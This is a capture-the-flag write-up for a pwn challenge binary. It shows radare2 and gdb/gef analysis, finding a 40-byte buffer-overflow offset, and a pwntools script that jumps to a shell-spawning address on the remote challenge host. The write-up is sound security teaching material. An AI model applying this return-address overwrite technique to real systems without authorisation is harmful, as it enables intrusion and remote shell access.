![2d1d58afb31029ae613b942ee8482bae.png](2c113d703dca483d8e2c197611f081b3.png)
Taking a look at the file we can see that it's a **64-bit Elf** binary
```
pwnchal: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
```
Nothing really stands out when analyzing with **radare2**. No win function this time, so let's take a look at the **vuln** function
![b70c51cd1881ecdc338d7b53d643a415.png](8d4f2fbb719449f7a1c6844c832b8b91.png)
Looks like there's an address that gives us a shell. Let's skip all the checks and just jump straight to that.
Loading the binary into **gdb** (using gef support), we can start poking at it and try to find the offset
I was having issues with `pattern create/search` so I did it the old fashioned way: sending lots of 'A's and 'B's until something looked neat
Using **gdb with gef** you can use `pi print('A'*100)` to quickly toss a string of characters together
After sending different lengths, I found that **40** was when we started seeing the 'B' characters leak in
`pi print('A'*40 + 'B')`
![180143eea7ff9f522522baac11c964d9.png](7f249bdae6ae4472aea3b063740f195a.png)
Things we know
1. It's a **64-bit ELF** binary
2. The address we want to jump to is 0x004011a1
3. The offset is 40
Here's my script using **pwntools**
```Python
from pwn import *
p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480)
offset = b'A'* 40
p.recvuntil('dreaming?\n')
p.sendline(offset + p64(0x004011a1))
p.interactive()
```
The `p64(0x004011a1)` function call packs the address in **Little Endian** format, required to be passed, and `p.interactive()` just catches the shell and allows us to send input.
![a1b9d579310f2aef21cded3a2d701bd0.png](11afecc367004cbc991ee0df833aa92e.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #exploit_development #buffer_overflow #gdb #gef
Related: